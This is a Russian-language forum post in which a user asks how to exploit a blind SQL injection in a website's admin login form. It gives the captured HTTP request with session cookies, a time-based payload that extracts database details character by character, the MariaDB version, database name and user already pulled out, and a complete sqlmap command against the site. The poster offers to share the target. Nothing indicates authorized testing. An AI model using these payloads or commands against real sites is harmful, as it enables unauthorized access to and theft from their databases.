Показать сообщение отдельно

  #315  
Старый 07.12.2016, 19:23
madam
Участник форума
Регистрация: 27.03.2014
Сообщений: 129
С нами: 6384566

Репутация: 1
По умолчанию

Подскажите Blind SQL Injection

POST /admin/login/ HTTP/1.1

Cache-Control: no-cache

Referer: https://site.com/admin/login/

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5

User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36

Accept-Language: en-us,en;q=0.5

Cookie: PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634

Host: site.com

Accept-Encoding: gzip, deflate

Content-Length: 80

Content-Type: application/x-www-form-urlencoded

username=&password=&login=Login

уязвимы оба параметра username,password


'+((SELECT 1 FROM (SELECT IF((ASCII(MID((DATABASE()),1,1)) >= 53),SLEEP(5),1))A))+'

перебором вытащила

VERSION 5.5.47-MariaDB

DB site_com

USER site_com

Sqlmap POST parameter 'username' is not injectable POST parameter 'password' is not injectable

sqlmap.py -u https://site.com/admin/login/ --data="username=&password=&login=Login" --cookie="PHPSESSID=lh4frmkpuqpgcob5dkqkv9ddq6; id=1481028712634" --user-agent="Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36" -v 3 -p username --dbs --prefix="'+" --suffix="+'" --technique=T

Пробовала уже по всякому ,Sqlmap не может найти Inj

Что я делаю не так?

могу скинуть сайт, если подскажете
 
Ответить с цитированием